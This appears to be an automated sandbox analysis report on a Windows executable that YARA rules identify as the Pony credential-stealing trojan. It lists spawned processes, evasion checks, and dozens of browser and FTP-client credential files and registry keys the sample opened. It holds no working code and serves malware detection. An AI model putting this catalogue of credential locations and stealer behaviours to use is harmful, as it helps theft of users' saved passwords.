            Source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTRMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
            Source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTRMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
            Source: Process Memory Space: BW38j8Jkbl.exe PID: 5904, type: MEMORYSTRMatched rule: Windows_Trojan_Pony_d5516fe8 reference_sample = 423e792fcd00265960877482e8148a0d49f0898f4bbc190894721fde22638567, os = windows, severity = x86, creation_date = 2021-08-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Pony, fingerprint = 9d4d847f55a693a45179a904efe20afd05a92650ac47fb19ef523d469a33795f, id = d5516fe8-3b25-4c46-9e5b-111ca312a824, last_modified = 2021-10-04
            Source: Process Memory Space: BW38j8Jkbl.exe PID: 5904, type: MEMORYSTRMatched rule: pony date = 2014-08-16, author = Brian Wallace @botnet_hunter, description = Identify Pony, author_email = bwall@ballastsecurity.net
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@7/1@1/1
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 1_2_0040D3BE CertOpenSystemStoreA,CertEnumCertificatesInStore,lstrcmp,lstrcmp,CryptAcquireCertificatePrivateKey,CryptGetUserKey,CryptExportKey,CryptExportKey,CryptDestroyKey,CryptReleaseContext,CertCloseStore,1_2_0040D3BE
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 1_2_00402968 LookupPrivilegeValueA,GetCurrentProcess,OpenProcessToken,AdjustTokenPrivileges,CloseHandle,FindCloseChangeNotification,1_2_00402968
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 1_2_00402CE7 WTSGetActiveConsoleSessionId,CreateToolhelp32Snapshot,Process32First,StrStrIA,ProcessIdToSessionId,OpenProcess,OpenProcessToken,ImpersonateLoggedOnUser,RegOpenCurrentUser,CloseHandle,CloseHandle,CloseHandle,Process32Next,CloseHandle,1_2_00402CE7
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1060:120:WilError_03
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile created: C:\Users\user\AppData\Local\Temp\6000093.batJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\6000093.bat" "C:\Users\user\Desktop\BW38j8Jkbl.exe" "
            Source: BW38j8Jkbl.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile read: C:\Windows\win.iniJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: BW38j8Jkbl.exe, 00000001.00000003.1791574250.00000000006B3000.00000004.00000020.00020000.00000000.sdmp, BW38j8Jkbl.exe, 00000001.00000003.1791503181.0000000000688000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: BW38j8Jkbl.exeReversingLabs: Detection: 79%
            Source: unknownProcess created: C:\Users\user\Desktop\BW38j8Jkbl.exe "C:\Users\user\Desktop\BW38j8Jkbl.exe"
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeProcess created: C:\Users\user\Desktop\BW38j8Jkbl.exe "C:\Users\user\Desktop\BW38j8Jkbl.exe"
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\6000093.bat" "C:\Users\user\Desktop\BW38j8Jkbl.exe" "
            Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeProcess created: C:\Users\user\Desktop\BW38j8Jkbl.exe "C:\Users\user\Desktop\BW38j8Jkbl.exe"Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\6000093.bat" "C:\Users\user\Desktop\BW38j8Jkbl.exe" "Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: msvbvm60.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: vb6zz.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: sxs.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: wsock32.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: samcli.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: msi.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: pstorec.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: mlang.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: napinsp.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: pnrpnsp.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: wshbth.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: nlaapi.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: winrnr.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: samlib.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior

            Data Obfuscation

            barindex
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeUnpacked PE file: 1.2.BW38j8Jkbl.exe.400000.0.unpack .text:ER;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;
            Source: Yara matchFile source: 0.2.BW38j8Jkbl.exe.4296000.1.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: BW38j8Jkbl.exe PID: 5904, type: MEMORYSTR
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 1_2_00410065 GetTickCount,wsprintfA,GetModuleFileNameA,GetTempPathA,lstrcat,ExitProcess,CreateFileA,lstrcpy,StrRChrIA,lstrcpy,ExitProcess,lstrlen,CloseHandle,wsprintfA,LoadLibraryA,GetProcAddress,ShellExecuteA,1_2_00410065
            Source: BW38j8Jkbl.exeStatic PE information: real checksum: 0xa2107 should be: 0xa18ac
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 0_2_00402D58 push cs; retf 0_2_00402D72

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile dump: 6000093.bat.1.dr 3880EEB1C736D853EB13B44898B718ABJump to dropped file
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 1_2_004051E3 FindFirstFileA,lstrcmpiA,lstrcmpiA,FindNextFileA,FindClose,1_2_004051E3
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 1_2_004041A6 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,1_2_004041A6
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 1_2_00404E73 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,FindNextFileA,FindClose,1_2_00404E73
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 1_2_00408AE5 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,1_2_00408AE5
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 1_2_00409832 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,StrStrIA,lstrlen,StrStrIA,StrStrIA,StrStrIA,FindNextFileA,FindClose,1_2_00409832
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 1_2_00408961 FindFirstFileA,lstrcmpiA,lstrcmpiA,StrStrIA,FindNextFileA,FindClose,1_2_00408961
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 1_2_004045FD GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,1_2_004045FD
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
            Source: BW38j8Jkbl.exe, 00000001.00000002.1811257857.0000000000638000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlly
            Source: BW38j8Jkbl.exe, 00000001.00000002.1811257857.0000000000638000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\r[
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeAPI call chain: ExitProcess graph end nodegraph_1-9253
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeAPI call chain: ExitProcess graph end nodegraph_1-9648
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeAPI call chain: ExitProcess graph end nodegraph_1-9110
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 1_2_00410065 GetTickCount,wsprintfA,GetModuleFileNameA,GetTempPathA,lstrcat,ExitProcess,CreateFileA,lstrcpy,StrRChrIA,lstrcpy,ExitProcess,lstrlen,CloseHandle,wsprintfA,LoadLibraryA,GetProcAddress,ShellExecuteA,1_2_00410065
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 0_2_022C0974 mov eax, dword ptr fs:[00000030h]0_2_022C0974
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 0_2_022C02B3 mov ebx, dword ptr fs:[00000030h]0_2_022C02B3
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 0_2_022C09DD mov eax, dword ptr fs:[00000030h]0_2_022C09DD
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 1_2_0040F990 mov eax, dword ptr fs:[00000030h]1_2_0040F990
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 1_2_004105D6 SetUnhandledExceptionFilter,RevertToSelf,1_2_004105D6
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 1_2_0041032D lstrcmpiA,LogonUserA,lstrlen,LCMapStringA,LogonUserA,LogonUserA,746B1B10,ImpersonateLoggedOnUser,RevertToSelf,746A5030,CloseHandle,1_2_0041032D
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeProcess created: C:\Users\user\Desktop\BW38j8Jkbl.exe "C:\Users\user\Desktop\BW38j8Jkbl.exe"Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\6000093.bat" "C:\Users\user\Desktop\BW38j8Jkbl.exe" "Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 1_2_004044D2 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,1_2_004044D2
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,1_2_004045FD
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 1_2_0041051E OleInitialize,GetUserNameA,1_2_0041051E
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeCode function: 1_2_004045FD GetVersionExA,GetLocaleInfoA,GetLocaleInfoA,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,1_2_004045FD

            Stealing of Sensitive Information

            barindex
            Source: Yara matchFile source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTR
            Source: Yara matchFile source: 1.2.BW38j8Jkbl.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.BW38j8Jkbl.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0.2.BW38j8Jkbl.exe.4296000.1.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000001.00000002.1811123790.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.1787368894.0000000004296000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: BW38j8Jkbl.exe PID: 7132, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: BW38j8Jkbl.exe PID: 5904, type: MEMORYSTR
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data-journalJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account-journalJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data-journalJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\wcx_ftp.iniJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\3\History.datJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\4\History.datJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xmlJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\SharedSettings.ccsJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\Frigate3\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\FTP Explorer\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings_1_0_5.ccsJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\SiteDesigner\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.sqliteJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\INSoftware\NovaFTP\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\SharedSettings_1_0_5.ccsJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\SharedSettings_1_0_5.sqliteJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 7 Home\QCToolbarJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\TurboFTP\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\sm.datJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\CuteFTP\sm.datJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Program Files (x86)\GlobalSCAPE\CuteFTP Pro\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\CoffeeCup Software\SharedSettings.ccsJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\GlobalSCAPE\CuteFTP Pro\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\BlazeFtp\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\RhinoSoft.com\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: HKEY_CURRENT_USER\Software\GlobalSCAPE\CuteFTP 6 Professional\QCToolbarJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\SharedSettings.ccsJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\Estsoft\ALFTP\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: HKEY_CURRENT_USER\Software\TurboFTPJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\CuteFTP\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\FTPInfo\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: HKEY_LOCAL_MACHINE\Software\WOW6432Node\AceBITJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\ExpanDrive\drives.jsJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\NetSarang\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\GlobalSCAPE\CuteFTP Pro\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\BitKinex\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\FileZilla\filezilla.xmlJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\LeapWare\LeapFTP\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\GPSoftware\Directory Opus\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\BitKinex\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\CoffeeCup Software\SharedSettings.ccsJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\FileZilla\filezilla.xmlJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: HKEY_CURRENT_USER\Software\AceBITJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\Estsoft\ALFTP\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\3\History.datJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\FTPInfo\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\FileZilla\filezilla.xmlJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\CoffeeCup Software\SharedSettings.ccsJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\BitKinex\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\FlashFXP\3\Sites.datJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\GlobalSCAPE\CuteFTP Lite\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\SharedSettings_1_0_5.sqliteJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Program Files (x86)\CuteFTP\Jump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\ProgramData\SharedSettings.ccsJump to behavior
            Source: C:\Users\user\Desktop\BW38j8Jkbl.exeFile opened: C:\Users\user\AppData\Local\FlashFXP\4\History.datJump to behavior
